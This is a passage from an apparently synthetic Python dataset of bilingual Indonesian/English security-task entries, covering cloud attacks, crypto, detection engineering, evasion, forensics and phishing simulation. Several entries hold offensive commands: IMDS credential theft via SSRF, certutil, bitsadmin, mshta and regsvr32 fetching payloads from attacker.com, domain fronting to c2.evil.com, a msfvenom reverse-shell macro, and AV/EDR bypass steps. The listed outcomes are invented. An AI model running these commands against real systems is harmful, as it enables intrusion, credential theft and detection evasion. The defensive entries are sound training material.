        "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME (get creds)",
        "use credentials: aws sts get-caller-identity --access-key ... --secret ..."],
       ["ssrf_confirm","metadata_access","role_list","cred_extract","cred_use"],
       [("curl","SSRF dan metadata API access")],
       "IMDSv2 require session token — SSRF via PUT tidak bisa bypass IMDSv2",
       "EC2 instance — IMDSv1 via SSRF, IAM role 'ec2-admin-role' credentials extracted",
       "cloud SSRF analyst",
       "IMDSv1 SSRF: 169.254.169.254/iam/security-credentials/ → ec2-admin-role creds!"),

    _e("audit GCP security configuration menggunakan ScoutSuite",
       ["ScoutSuite = multi-cloud security audit tool mendukung GCP, AWS, Azure",
        "butuh service account dengan viewer permissions",
        "jalankan per project untuk GCP",
        "output: HTML report dengan findings per kategori"],
       ["scout gcp --project PROJECT_ID (ScoutSuite GCP audit)",
        "gcloud projects list (enumerate projects)",
        "gcloud iam service-accounts list --project PROJECT_ID",
        "gcloud compute instances list (EC2 equivalent GCP)"],
       ["project_enum","scout_run","iam_review","storage_check","compute_check"],
       [("scoutsuite","multi-cloud security audit"),("gcloud","GCP CLI")],
       "GCP audit juga perlu check: Cloud SQL public IP, compute engine metadata server",
       "GCP project — Cloud Storage bucket public, IAM overpermissioned service accounts",
       "GCP security auditor",
       "ScoutSuite GCP: scout gcp --project PROJECT_ID → public bucket + over-privileged SA"),

    _e("Azure AD security assessment menggunakan ROADtools",
       ["ROADtools = Azure AD/Entra ID enumeration dan attack framework",
        "dump semua Azure AD objects: users, groups, apps, service principals",
        "identify: over-privileged identities, guest accounts, app permissions",
        "roadrecon untuk data collection, roadrecon-gui untuk analysis"],
       ["roadrecon gather -u user@domain.com -p password",
        "roadrecon auth -u user@domain.com -p password",
        "roadrecon-gui (web interface untuk analysis)",
        "python3 roadrecon-plugins/..."],
       ["auth_setup","data_gather","gui_analysis","finding_extract"],
       [("roadrecon","Azure AD data gathering dan analysis"),
        ("roadrecon-gui","Azure AD graph visualization")],
       "Azure AD guest accounts sering over-permissioned — focus on external member review",
       "Azure AD — 15 guest accounts, 3 service principals dengan Owner role, 2 stale app registrations",
       "Azure AD security analyst",
       "ROADtools: roadrecon gather → Azure AD snapshot, analyzing permissions..."),

    _e("hunt untuk CloudTrail gaps dan tampering indicators",
       ["CloudTrail = AWS audit logging — tanpa CloudTrail, no visibility",
        "attacker sering disable CloudTrail atau delete logs",
        "hunt: CloudTrail disabled events, S3 bucket delete, log tampering",
        "AWS Security Hub dan GuardDuty untuk automated detection"],
       ["aws cloudtrail describe-trails (verify enabled)",
        "aws cloudtrail get-trail-status --name default (check recording)",
        "aws logs filter-log-events --log-group-name CloudTrail/DefaultLogGroup --filter-pattern 'DeleteTrail'",
        "aws s3api get-bucket-logging --bucket cloudtrail-bucket"],
       ["trail_verify","recording_check","tampering_hunt","log_integrity"],
       [("aws CLI","CloudTrail status dan log analysis")],
       "CloudTrail disabled = attacker blind spot — immediate alert dan re-enable",
       "AWS account — CloudTrail disabled 2 jam lalu, 3 high-risk API calls tanpa logging",
       "AWS forensics analyst",
       "CloudTrail hunt: describe-trails → DISABLED! Re-enabling + hunting gap activity..."),

    _e("enumerate Azure storage accounts untuk misconfiguration",
       ["Azure Blob Storage = AWS S3 equivalent, sering misconfigured",
        "public blob container = data exposure",
        "SAS token expired tapi still embedded di source code",
        "Azure Storage Explorer atau az CLI untuk enumeration"],
       ["az storage account list (list all storage accounts)",
        "az storage container list --account-name ACCOUNT (list containers)",
        "az storage blob list --container-name CONTAINER --account-name ACCOUNT",
        "check: Allow Blob Public Access setting di portal"],
       ["account_enum","container_enum","blob_list","access_assess"],
       [("az CLI","Azure storage enumeration"),
        ("azure storage explorer","GUI Azure storage browser")],
       "SAS token dalam git history = valid vulnerability bahkan jika expired karena pattern disclosure",
       "Azure — 2 public blob containers berisi backup files, 1 SAS token dalam README",
       "Azure storage security analyst",
       "Azure storage: az storage container list → 2 public containers! Blob listing..."),

    _e("exploit Lambda function untuk privilege escalation di AWS",
       ["Lambda PE = create/update Lambda dengan malicious code dan invoke",
        "iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction = PE path",
        "malicious Lambda bisa: assume role, create IAM user, access resources",
        "pacu module: lambda__backdoor_new_roles"],
       ["pacu: run lambda__backdoor_new_roles (backdoor new Lambda roles)",
        "create Lambda dengan execution role yang memiliki higher privilege",
        "invoke Lambda untuk execute privileged operations",
        "aws lambda invoke --function-name malicious_lambda output.txt"],
       ["pe_path_identify","lambda_create","invoke_execute","privilege_obtain"],
       [("pacu","Lambda PE exploitation"),("aws CLI","Lambda management")],
       "Lambda execution role bisa memiliki AdministratorAccess — common misconfiguration",
       "AWS — Lambda PE via iam:PassRole + lambda:CreateFunction → AdministratorAccess obtained",
       "AWS Lambda PE analyst",
       "Lambda PE: create function dengan admin execution role → invoke → AdministratorAccess!"),

    # ── CRYPTO (166-175) ──────────────────────────────────────────────────────
    _e("identify hash type dari string 5f4dcc3b5aa765d61d8327deb882cf99",
       ["string panjang 32 karakter hex → kemungkinan MD5",
        "hashid atau haiti untuk automatic hash identification",
        "verify dengan hashcat --example-hashes",
        "setelah identified: pilih hashcat mode yang tepat"],
       ["hashid 5f4dcc3b5aa765d61d8327deb882cf99",
        "haiti 5f4dcc3b5aa765d61d8327deb882cf99",
        "hashcat -m 0 '5f4dcc3b5aa765d61d8327deb882cf99' rockyou.txt"],
       ["hash_id","mode_select","crack_attempt"],
       [("hashid","hash type identification"),("hashcat","hash cracking")],
       "5f4dcc3b...= MD5('password') — selalu verify hash value sebelum report",
       "5f4dcc3b5aa765d61d8327deb882cf99 → MD5, cracked: 'password'",
       "hash analyst",
       "Hash identified: MD5. Cracking: hashcat -m 0 hash.txt rockyou.txt"),

    _e("decode base64 encoded payload yang ditemukan di malware sample",
       ["base64 adalah encoding standar, bukan enkripsi",
        "python one-liner untuk quick decode",
        "sering ada multiple layers: base64 → hex → ROT13 → actual payload",
        "setelah decode: check apakah hasilnya binary, plaintext, atau encoded lagi"],
       ["echo 'BASE64STRING' | base64 -d",
        "python3 -c \"import base64; print(base64.b64decode('STRING').decode())\"",
        "cyberchef 'From Base64' → 'Raw Inflate' untuk compressed payload"],
       ["initial_decode","layer_check","content_analyze"],
       [("cyberchef","web-based crypto dan encoding multi-tool"),
        ("python","scripted decode operations")],
       "malware sering pakai multi-layer encoding — jangan berhenti di layer pertama",
       "base64 decoded → hex string → decoded lagi → PowerShell downloader payload",
       "malware analyst",
       "Base64 decode: echo 'STRING' | base64 -d → hex string terdeteksi, decoding layer 2..."),

    _e("crack RSA private key dengan weak prime factors",
       ["RSA keamanannya bergantung pada kesulitan memfaktorkan N = p*q",
        "jika prime p atau q terlalu kecil atau shared antar keys = vulnerable",
        "RsaCtfTool untuk automated attack: Fermat factoring, Wiener, small e",
        "check: factor.db atau factordb.com untuk known factorization"],
       ["python3 RsaCtfTool.py --publickey public.pem --private (auto-attack)",
        "python3 RsaCtfTool.py --publickey public.pem --attack fermat,wiener,smallq",
        "curl https://factordb.com/api?query=N (online factorization lookup)"],
       ["key_analyze","auto_attack","specific_attack","factor_lookup"],
       [("RsaCtfTool","automated RSA attack tool"),("factordb","online factorization database")],
       "RsaCtfTool memiliki 30+ attack methods — mulai dengan auto untuk CTF",
       "CTF RSA — Fermat factoring berhasil (close primes), private key recovered, flag decrypted",
       "CTF crypto analyst",
       "RSA attack: RsaCtfTool --attack fermat → close primes detected → private key recovered!"),

    _e("analisa protocol kriptografi custom yang ditemukan dalam CTF",
       ["custom crypto = red flag, biasanya memiliki fundamental flaw",
        "identifikasi operasi: XOR, substitution, transposition, modular arithmetic",
        "cari: repeating key, predictable nonce, atau ECB mode indicators",
        "CyberChef untuk manual analysis dan transformasi"],
       ["extract ciphertext dan key material dari traffic/source",
        "identify: apakah XOR? test dengan crib dragging",
        "identify: apakah Caesar? frekuensi analysis",
        "cyberchef untuk chain multiple operations"],
       ["operation_identify","crib_drag","freq_analysis","chain_decode"],
       [("cyberchef","crypto chain analysis"),
        ("python","custom crypto analysis scripting")],
       "custom crypto hampir selalu broken — fokus pada logic flaw bukan complexity",
       "CTF — XOR dengan repeating key, crib dragging dengan 'the ' reveal key: 'SECRET'",
       "CTF crypto solver",
       "Custom crypto: XOR detected, crib drag attack → key='SECRET', plaintext: flag{...}"),

    _e("detect dan exploit ECB mode encryption vulnerability",
       ["ECB mode = deterministic block encryption, same plaintext = same ciphertext",
        "ECB penguin attack: identical blocks produce identical ciphertext",
        "byte-at-a-time ECB decryption: satu byte inject sekaligus",
        "padding oracle atau block manipulation untuk bypass"],
       ["test ECB: submit dua blok identical plaintext, cek ciphertext",
        "jika block 1 ciphertext == block 2 ciphertext → ECB mode confirmed",
        "byte-at-a-time: craft input yang align secret byte di block boundary",
        "brute force single byte: 256 possibilities per byte"],
       ["mode_detect","ecb_confirm","byte_at_time_setup","brute_byte"],
       [("python","ECB byte-at-a-time scripting"),
        ("burpsuite","ECB mode detection via encryption oracle")],
       "ECB oracle attack complexity: O(256 * plaintext_length) — manageable untuk typical flags",
       "CTF encryption oracle — ECB mode confirmed, flag decrypted byte-by-byte",
       "ECB exploit analyst",
       "ECB detected: identical blocks → same ciphertext. Byte-at-a-time attack starting..."),

    _e("analisa dan exploit padding oracle pada CBC mode encryption",
       ["CBC padding oracle = leak info dari padding validation error",
        "padbuster untuk automated exploitation",
        "manual: kirim ciphertext dengan modified last byte, observe error vs success",
        "decrypt ciphertext: XOR intermediate bytes"],
       ["padbuster https://target.com/page ENCRYPTED_COOKIE 8 -cookies 'session=VALUE'",
        "manual: block manipulation untuk decrypt satu byte per request",
        "forge ciphertext: modify IV untuk control plaintext"],
       ["oracle_identify","auto_exploit","manual_verify","forge_plaintext"],
       [("padbuster","automated padding oracle exploit")],
       "padding oracle butuh banyak requests — lambat tapi sangat reliable",
       "target.com — CBC padding oracle confirmed, session decrypted: {role:'admin'}",
       "padding oracle exploit specialist",
       "Padding oracle: padbuster → session cookie decrypted, forging admin role token..."),

    # ── DEFENSE (176-185) ─────────────────────────────────────────────────────
    _e("setup YARA rule untuk deteksi malware berbasis IOC yang ditemukan",
       ["YARA rules = pattern matching untuk file scanning",
        "kumpulkan IOC: strings, hex patterns, file hashes dari sample",
        "tulis rule dengan conditions: 2 dari 5 strings untuk reduce false positive",
        "yarGen untuk auto-generate rule dari malware sample"],
       ["yarGen.py -m ./malware_sample/ -o custom_rules.yar",
        "yara custom_rules.yar test_files/ (testing)",
        "yara custom_rules.yar /suspicious/path/ (production scan)"],
       ["ioc_collect","rule_write","rule_test","deploy"],
       [("yarGen","automated YARA rule generation"),("yara","YARA rule execution")],
       "test rule pada 1000+ clean files untuk validate false positive rate <0.1%",
       "malware_dropper.exe — 3 unique strings extracted, YARA rule generated",
       "defensive security engineer",
       "Generating YARA rule: yarGen.py -m ./malware_sample/ -o custom_rules.yar"),

    _e("analisa event log Windows untuk deteksi suspicious activity dengan chainsaw",
       ["chainsaw = fast Windows event log parser dengan detection rules",
        "fokus pada event IDs kritis: 4624 (logon), 4688 (process create), 7045 (service install)",
        "sigma rules untuk cross-platform detection logic",
        "hunting: cari lateral movement, persistence, credential access patterns"],
       ["chainsaw hunt /path/to/evtx/ --sigma sigma_rules/ --mapping mappings/sigma-event-logs-all.yml",
        "chainsaw search -e 4624 /path/to/Security.evtx",
        "chainsaw dump /path/to/System.evtx --json > system_events.json"],
       ["log_collect","sigma_hunt","event_filter","timeline_build"],
       [("chainsaw","Windows event log hunting tool"),("sigma","detection rules framework")],
       "sigma rules perlu disesuaikan dengan environment untuk minimize false positive",
       "Windows EVTX — 15 lateral movement indicators, 3 persistence mechanisms detected",
       "threat hunter",
       "Event log analysis: chainsaw hunt evtx/ --sigma sigma_rules/"),

    _e("deploy Snort IDS rule untuk detect exploit attempts",
       ["Snort IDS = network intrusion detection dengan rule-based detection",
        "tulis rule untuk detect specific attack patterns dalam network traffic",
        "test rule pada pcap sebelum deploy ke production",
        "alert vs drop: Snort IDS (alert) vs Snort IPS (drop)"],
       ["snort -r suspicious.pcap -c /etc/snort/snort.conf -A console",
        "custom rule: alert tcp any any -> $HOME_NET 80 (content:'../../../'; msg:'Path Traversal';)",
        "snort -T -c /etc/snort/snort.conf (validate config sebelum deploy)"],
       ["rule_write","test_on_pcap","validate_config","deploy_production"],
       [("snort","network IDS/IPS")],
       "Snort rules sangat spesifik — terlalu broad = high false positive, terlalu narrow = miss",
       "Path traversal Snort rule deployed, testing pada last week pcap → 5 TP, 0 FP",
       "IDS rule developer",
       "Snort rule: alert tcp path traversal pattern → testing pada pcap → 5 detections!"),

    _e("implement defense in depth untuk web application",
       ["defense in depth = multiple layer security controls",
        "layer: WAF → authentication → authorization → input validation → output encoding",
        "tidak ada single point of failure",
        "setiap layer catch different class of attack"],
       ["Layer 1: WAF rules untuk block common attacks",
        "Layer 2: Strong authentication (MFA required)",
        "Layer 3: Authorization check pada setiap endpoint",
        "Layer 4: Input validation dan sanitization",
        "Layer 5: Output encoding untuk prevent XSS",
        "Layer 6: Security headers (CSP, HSTS, X-Frame-Options)",
        "Layer 7: Logging dan monitoring semua requests"],
       ["waf_deploy","mfa_enforce","authz_implement","input_validate","header_set","logging_enable"],
       [("modsecurity","open source WAF"),("fail2ban","automatic IP banning")],
       "defense in depth tidak membuat system unhackable — fokus pada minimize impact jika breach",
       "web app — 7 layer security implemented, pentest rescan: 0 critical, 2 low findings",
       "security architect",
       "Defense in depth implemented: WAF + MFA + AuthZ + Validation + Headers + Logging"),

    _e("setup Sigma rules untuk SIEM detection",
       ["Sigma = vendor-neutral detection rule format yang dapat diconvert ke berbagai SIEM",
        "convert ke Splunk, Elastic, QRadar dengan sigmac atau pySigma",
        "hunting rule vs alerting rule: berbeda tuning requirement",
        "community rules di SigmaHQ github untuk reference"],
       ["wget https://github.com/SigmaHQ/sigma/archive/main.zip",
        "sigmac -t splunk -c splunk-windows.yml sigma_rules/lateral_movement.yml",
        "test rule query di SIEM dengan historical data",
        "tune: reduce false positive sebelum enable alerting"],
       ["rule_select","convert_format","test_query","tune_fp","enable_alert"],
       [("sigma","detection rule framework"),("sigmac","Sigma rule converter")],
       "convert Sigma ke SIEM-specific query, lalu tune dengan real data sebelum production",
       "Sigma rules: 150 rules deployed ke Splunk, tuned to <5 FP/day",
       "detection engineer",
       "Sigma deployment: sigmac -t splunk lateral_movement.yml → Splunk query, testing..."),

    _e("threat modeling aplikasi menggunakan STRIDE framework",
       ["STRIDE = Spoofing, Tampering, Repudiation, Info Disclosure, DoS, Elevation of Privilege",
        "untuk setiap komponen sistem: identify threats per kategori STRIDE",
        "data flow diagram (DFD) sebagai input untuk threat modeling",
        "output: threat list dengan mitigasi per threat"],
       ["buat DFD: actors, processes, data stores, data flows",
        "untuk setiap elemen: apply STRIDE categories",
        "rate risk: likelihood x impact",
        "map ke mitigations: existing vs missing controls"],
       ["dfd_create","stride_apply","risk_rate","control_map","gap_identify"],
       [("microsoft threat modeling tool","STRIDE-based threat modeling"),
        ("OWASP Threat Dragon","open source threat modeling")],
       "threat modeling lebih efektif di awal SDLC — mahal jika dilakukan setelah development",
       "web app threat model — 23 threats identified, 8 tidak ada mitigasi, 3 critical gaps",
       "threat modeling consultant",
       "STRIDE analysis: 23 threats identified, 8 unmitigated, 3 critical: no auth on admin API"),

    _e("implement honeypot untuk detect reconnaissance activity",
       ["honeypot = decoy system untuk attract dan detect attacker",
        "low-interaction: emulate services, log connections",
        "high-interaction: real system yang heavily monitored",
        "canary tokens untuk detect credential atau file access"],
       ["deploy opencanary (low-interaction honeypot)",
        "opencanary --copyconfig > opencanary.conf",
        "enable services: SSH, FTP, HTTP, SMB emulation",
        "alert: setiap connection ke honeypot = immediate alert"],
       ["honeypot_deploy","service_config","alert_setup","log_monitor"],
       [("opencanary","network honeypot"),("canarytokens","decoy token deployment")],
       "honeypot harus realistic — bukan too obvious atau terlalu attractive",
       "honeypot deployed — 3 connection attempts dalam 24 jam: 1 internal (policy violation), 2 external",
       "honeypot operator",
       "OpenCanary honeypot: deploy SSH+HTTP emulation → first alert dalam 2 jam!"),

    _e("monitoring dan alerting untuk unauthorized privilege escalation",
       ["monitor PE attempts: sudo, su, UAC bypass, token manipulation",
        "Sysmon event 4688 untuk process creation dengan parent-child analysis",
        "SIEM rule: low-priv process spawn shell process yang tidak expected",
        "immediate alert: SYSTEM/root shell dari web server process"],
       ["sysmon config: capture process create dengan command line",
        "SIEM rule: IF parent=apache2 AND child=bash THEN alert PE_ATTEMPT",
        "Elastic rule: process.parent.name:httpd AND process.name:bash",
        "Wazuh decoder untuk custom PE detection"],
       ["sysmon_configure","siem_rule","alert_config","response_playbook"],
       [("sysmon","Windows process monitoring"),("elastic/wazuh","SIEM alert platform")],
       "rate tuning kritis — terlalu banyak false positive = alert fatigue = missed real threat",
       "monitoring active — httpd spawning bash detected, incident created, SOC alerted",
       "SOC detection engineer",
       "PE monitoring: Sysmon + SIEM rule → httpd→bash spawn detected! Alert fired!"),

    # ── EVASION (186-190) ─────────────────────────────────────────────────────
    _e("bypass Windows Defender sebelum menjalankan payload",
       ["Windows Defender pakai signature + heuristic + cloud-based detection",
        "AMSITrigger untuk identify string yang trigger AMSI",
        "DefenderCheck untuk identify signature yang dideteksi",
        "obfuscate string yang trigger, ubah variable names"],
       ["AMSITrigger.exe -i payload.ps1 (identify trigger strings)",
        "DefenderCheck.exe payload.exe (identify detected signatures)",
        "Invoke-Obfuscation untuk PowerShell script obfuscation"],
       ["trigger_identify","obfuscate","test_bypass","validate"],
       [("AMSITrigger","AMSI trigger string identification"),
        ("DefenderCheck","Defender signature identification"),
        ("Veil","payload obfuscation")],
       "AV bypass adalah cat-and-mouse game — apa yang works hari ini mungkin tidak works besok",
       "payload.ps1 — 3 AMSI trigger strings identified, obfuscated versi bypass Defender",
       "red team operator",
       "AV bypass: AMSITrigger.exe -i payload.ps1 → 3 triggers, obfuscating..."),

    _e("bypass EDR hooks menggunakan direct syscalls",
       ["EDR hooks = patch API calls di userland untuk intercept",
        "direct syscalls = bypass userland hooks langsung ke kernel",
        "SysWhispers2/3 untuk generate syscall stubs",
        "hanya work jika kernel tidak di-patch (PatchGuard)"],
       ["SysWhispers3 untuk generate syscall stubs dalam C",
        "compile payload yang menggunakan direct syscalls",
        "test pada system dengan EDR dalam isolated environment",
        "alternatively: NTDLL unhooking atau module stomping"],
       ["hook_analysis","syscall_gen","payload_compile","edr_test"],
       [("SysWhispers","direct syscall implementation generator"),
        ("Pe-sieve","EDR hook detection")],
       "direct syscall evasion butuh re-implement setiap Windows API secara manual",
       "CrowdStrike test — direct syscalls bypass hooks, payload executed undetected",
       "advanced evasion specialist",
       "EDR bypass: SysWhispers3 → direct syscalls → payload undetected by CrowdStrike"),

    _e("network traffic obfuscation menggunakan domain fronting",
       ["domain fronting = hide C2 communication di balik legitimate CDN traffic",
        "request ke CDN hostname, CDN forward ke actual C2 dalam Host header",
        "CloudFront, Fastly, Azure CDN sering digunakan",
        "CDN providers increasingly blocking ini — check current feasibility"],
       ["setup CDN distribution yang forward ke C2 server",
        "client request: https://legitimate-cdn.com dengan Host: c2.evil.com",
        "CDN meneruskan ke c2.evil.com berdasarkan Host header",
        "traffic tampak sebagai legitimate CDN communication"],
       ["cdn_setup","c2_configure","client_configure","traffic_verify"],
       [("CDN provider","domain fronting infrastructure"),
        ("Cobalt Strike","C2 framework dengan malleable profile")],
       "banyak CDN sudah menutup domain fronting — test feasibility dulu",
       "domain fronting via CloudFront — C2 traffic look like AWS traffic, IDS tidak detect",
       "C2 evasion specialist",
       "Domain fronting: traffic via CloudFront → C2, IDS sees only AWS CloudFront traffic"),

    _e("living off the land (LOtL) menggunakan built-in Windows tools",
       ["LOtL = gunakan legitimate Windows tools untuk avoid detection",
        "certutil, bitsadmin, mshta, regsvr32, wscript semuanya bisa digunakan",
        "tidak ada custom executable yang perlu di-drop — lebih stealthy",
        "LOLBAS project untuk reference semua binary yang dapat digunakan"],
       ["certutil -urlcache -split -f http://attacker.com/payload.exe (file download)",
        "bitsadmin /transfer download http://attacker.com/file C:\\temp\\file",
        "mshta http://attacker.com/payload.hta (execute remote HTA)",
        "regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll"],
       ["binary_select","payload_stage","execute_lolbas","cleanup"],
       [("lolbas","Living Off the Land Binaries reference"),
        ("certutil","Windows certificate utility (LOtL)"),
        ("bitsadmin","Windows bits admin (LOtL)")],
       "LOtL detection butuh behavioral analytics — signature-based detection sering miss",
       "red team — payload delivery via certutil, no custom exe on disk, minimal EDR detection",
       "LOtL evasion analyst",
       "LOtL: certutil -urlcache -f http://c2/payload.exe → file downloaded via built-in tool"),

    _e("payload delivery via malicious Office macro",
       ["Office macro = VBA code dalam dokument Word/Excel yang auto-run",
        "masih very effective di targeted attack dan phishing",
        "macro builder tools: EvilClippy, SharpShooter, msfvenom",
        "evasion: disable AMSI dalam macro, obfuscate VBA code"],
       ["msfvenom -p windows/x64/meterpreter/reverse_https LHOST=... -f vba",
        "EvilClippy -s malicious.vba document.docm (obfuscate dan inject)",
        "atau: SharpShooter --stageless --dotnet35 --output malicious.xls --payload ..."],
       ["payload_generate","macro_inject","vba_obfuscate","delivery"],
       [("msfvenom","payload generation"),("EvilClippy","VBA obfuscation dan injection")],
       "Office Protected View block macro — perlu social engineering untuk enable atau bypass",
       "phishing sim — malicious.docm via spear phishing, 3/10 target enable macro dan execute",
       "macro payload specialist",
       "Office macro payload: msfvenom VBA → EvilClippy obfuscate → email delivery"),

    # ── FORENSICS (191-196) ───────────────────────────────────────────────────
    _e("analisa memory dump dari sistem yang dicurigai terinfeksi malware",
       ["memory dump = snapshot RAM yang berisi proses aktif, network connections, dll",
        "volatility adalah tool utama untuk memory forensics",
        "mulai dengan imageinfo untuk detect OS profile",
        "malfind untuk detect injected code dalam proses"],
       ["volatility -f memory.dmp imageinfo",
        "volatility -f memory.dmp --profile=Win10x64 pslist",
        "volatility -f memory.dmp --profile=Win10x64 netscan",
        "volatility -f memory.dmp --profile=Win10x64 malfind -D extracted/"],
       ["profile_detect","proc_list","net_enum","inject_detect","artifact_extract"],
       [("volatility","memory forensics framework"),("strings","string extraction")],
       "malfind menghasilkan banyak false positive — verify tiap extract dengan VirusTotal",
       "memory.dmp Win10x64 — svchost.exe suspicious (injected code)",
       "forensic investigator",
       "Memory analysis: volatility -f memory.dmp imageinfo → Win10x64 profile detected"),

    _e("extract digital artifacts dari disk image untuk incident response",
       ["disk image forensics = non-destructive analysis tanpa alter original",
        "mount read-only atau gunakan forensic tools langsung",
        "autopsy GUI untuk comprehensive analysis",
        "artifact focus: browser history, recent files, registry, prefetch"],
       ["autopsy (GUI) → new case → load disk.img",
        "sleuthkit: fls -r disk.img untuk file listing",
        "analyzeMFT.py untuk Windows MFT parsing",
        "plaso (log2timeline) untuk timeline generation"],
       ["image_load","file_system_enum","artifact_extract","timeline_build","report"],
       [("autopsy","GUI disk forensics platform"),("sleuthkit","CLI forensic tools"),
        ("plaso","timeline forensics tool")],
       "timeline analysis sangat powerful untuk reconstruct attacker activity sequence",
       "disk.img — attacker files: /tmp/payload.sh, browser history ke pastebin.com",
       "digital forensics investigator",
       "Disk forensics: autopsy case created, loading disk.img for artifact extraction"),

    _e("analisa network pcap untuk reconstruct attacker activities",
       ["pcap = packet capture yang berisi semua network traffic",
        "wireshark untuk interactive analysis, tshark untuk scripted analysis",
        "zeek untuk protocol-level log extraction",
        "cari: lateral movement, data exfiltration, C2 communication"],
       ["wireshark suspicious.pcap (GUI analysis)",
        "tshark -r suspicious.pcap -q -z conv,tcp (TCP conversation stats)",
        "zeek -r suspicious.pcap (generate protocol logs)",
        "tshark -r suspicious.pcap -Y 'http.request' -T fields -e http.host -e http.request.uri"],
       ["pcap_open","conversation_stats","protocol_extract","http_recon","c2_identify"],
       [("wireshark","network packet analysis GUI"),("tshark","CLI packet analyzer"),
        ("zeek","network security monitor")],
       "large pcap → tshark filter dulu sebelum buka di Wireshark untuk performance",
       "suspicious.pcap — DNS tunneling detected, C2 beacon tiap 60 detik ke 185.x.x.x",
       "network forensics analyst",
       "PCAP analysis: zeek logs → DNS tunneling pattern + C2 beacon identified"),

    _e("recover deleted files dari disk image menggunakan photorec",
       ["deleted file recovery = file yang di-delete tapi belum overwrite",
        "photorec untuk automated file carving berdasarkan file signatures",
        "foremost sebagai alternatif",
        "berguna untuk: IR (evidence recovery), CTF forensics"],
       ["photorec disk.img (GUI/CLI untuk file carving)",
        "foremost -i disk.img -o recovered/ (signature-based carving)",
        "bulk_extractor disk.img -o output/ (extract emails, URLs, credit cards)"],
       ["carving_run","file_type_filter","sort_by_interest","examine_recovered"],
       [("photorec","file carving dari disk image"),("foremost","signature-based file recovery"),
        ("bulk_extractor","bulk artifact extraction")],
       "photorec recover berdasarkan file signature — tidak recover filename, hanya content",
       "disk.img — 340 files recovered: 12 PDFs, 45 images, 1 database dump",
       "digital evidence recovery specialist",
       "File carving: photorec disk.img → 340 files recovered. Sorting by type..."),

    _e("forensic analysis pada mobile device image",
       ["mobile forensics = extract dan analyze data dari smartphone image",
        "cellebrite (commercial) atau MSAB XRY untuk physical extraction",
        "open source: iLEAPP (iOS), ALEAPP (Android) untuk artifact parsing",
        "artifacts: contacts, messages, location history, app data, deleted items"],
       ["ALEAPP.py -t zip -i android_image.zip -o output/ (Android ALEAPP)",
        "iLEAPP.py -t zip -i ios_backup.zip -o output/ (iOS iLEAPP)",
        "sqlite3 output/com.whatsapp/databases/msgstore.db (WhatsApp messages)"],
       ["image_load","aleapp_parse","artifact_review","message_extract","location_analysis"],
       [("aleapp","Android forensics artifact parser"),("ileapp","iOS forensics artifact parser")],
       "mobile forensics butuh proper chain of custody — document setiap step",
       "Android image — 340 WhatsApp messages recovered, 15 deleted, 3 location clusters",
       "mobile forensics investigator",
       "Android forensics: ALEAPP → WhatsApp messages + location history extracted"),

    _e("timeline forensics menggunakan log2timeline dan plaso",
       ["timeline analysis = reconstruct sequence of events secara kronologis",
        "plaso mengparse 100+ artifact types ke unified timeline",
        "psteal.py untuk automated pipeline: parse → output",
        "filter timeline dengan psort untuk specific timeframe atau artifact"],
       ["log2timeline.py plaso.dump /path/to/evidence/ (create plaso dump)",
        "psort.py -z UTC -o dynamic plaso.dump \"date > '2024-01-01'\" > timeline.csv",
        "timesketch upload untuk web-based timeline analysis",
        "grep -i 'attacker_tool' timeline.csv untuk specific artifact search"],
       ["artifact_parse","timeline_create","time_filter","event_correlate","narrative_build"],
       [("plaso","multi-artifact timeline creator"),("timesketch","web-based timeline analysis")],
       "timezone handling kritis dalam timeline — normalize semua ke UTC",
       "plaso timeline — 450k events, attacker activity clear: recon D1, exploit D2, persist D3",
       "timeline forensics analyst",
       "Plaso timeline: log2timeline.py → 450k events, filtering attacker artifacts..."),

    # ── MALWARE (197-198) ─────────────────────────────────────────────────────
    _e("analisa malware sample secara static tanpa menjalankannya",
       ["static analysis = analisa binary tanpa eksekusi, aman di mesin lokal",
        "strings untuk extract readable strings: URLs, commands, registry keys",
        "ghidra atau radare2 untuk disassembly dan decompilation",
        "FLOSS (FireEye) untuk extract obfuscated/encoded strings"],
       ["file malware.exe","strings -n 8 malware.exe | grep -E 'http|.exe|cmd'",
        "floss malware.exe > floss_output.txt",
        "ghidra (load file, analyze, review main function)"],
       ["file_type_id","string_extract","obfusc_decode","disassembly","behavior_predict"],
       [("strings","string extraction"),("floss","obfuscated string extraction"),
        ("ghidra","reverse engineering platform")],
       "review strings sebelum dynamic analysis untuk predict behavior",
       "malware.exe — PE32, UPX packed, C2: evil.ru:8443",
       "malware analyst",
       "Static analysis: strings malware.exe | grep http → C2 URL extracted"),

    _e("reverse engineer custom packer menggunakan x64dbg dan scylla",
       ["packed malware = original code di-compress atau encrypt, unpacked at runtime",
        "x64dbg untuk dynamic analysis dan manual unpacking",
        "OEP (Original Entry Point) adalah target — breakpoint di VirtualAlloc/VirtualProtect",
        "Scylla untuk dump unpacked memory dan fix imports"],
       ["x64dbg: load malware.exe, BP pada VirtualAlloc",
        "step through decompression/decryption loop",
        "find OEP: setelah unpacking selesai, code sudah di-restore",
        "Scylla: dump memory region ke file, fix imports, save PE"],
       ["packer_identify","dynamic_unpack","oep_find","memory_dump","import_fix"],
       [("x64dbg","Windows debugger untuk dynamic analysis"),
        ("scylla","PE dump dan import fixer")],
       "custom packer butuh manual analysis — tidak ada tool yang fully automated",
       "malware.exe — custom XOR packer, OEP ditemukan, unpacked ke clean PE",
       "malware reverse engineer",
       "Unpacking: x64dbg BP VirtualAlloc → decompression loop → OEP found → Scylla dump"),

    # ── SOCIAL + IOT (199-200) ─────────────────────────────────────────────────
    _e("setup GoPhish phishing campaign untuk security awareness test",
       ["phishing test = authorized simulation untuk test user security awareness",
        "GoPhish = platform phishing campaign management",
        "persiapan: domain clone, email template, target list dari HR",
        "tracking: email open, link click, credential submit"],
       ["gophish (start service)","buat sending profile (SMTP server)",
        "buat email template (clone dari legitimate email)",
        "buat landing page (clone dari login page)",
        "launch campaign, monitor dashboard"],
       ["infra_setup","template_create","campaign_launch","track_metrics","report"],
       [("gophish","phishing campaign management platform")],
       "always get explicit written authorization sebelum phishing campaign",
       "campaign: 150 users, 45 clicked (30%), 12 submitted credentials (8%)",
       "security awareness consultant",
       "GoPhish campaign configured. Launching simulation untuk 150 target users."),

    _e("extract dan analisa firmware dari router IoT target",
       ["firmware = software yang ada di flash storage perangkat IoT",
        "binwalk untuk extract filesystem dari firmware binary",
        "firmwalker untuk automated scan terhadap extracted filesystem",
        "cari: hardcoded credentials, private keys, API endpoints, debug backdoors"],
       ["binwalk -e firmware.bin","firmwalker.sh _firmware.bin.extracted/",
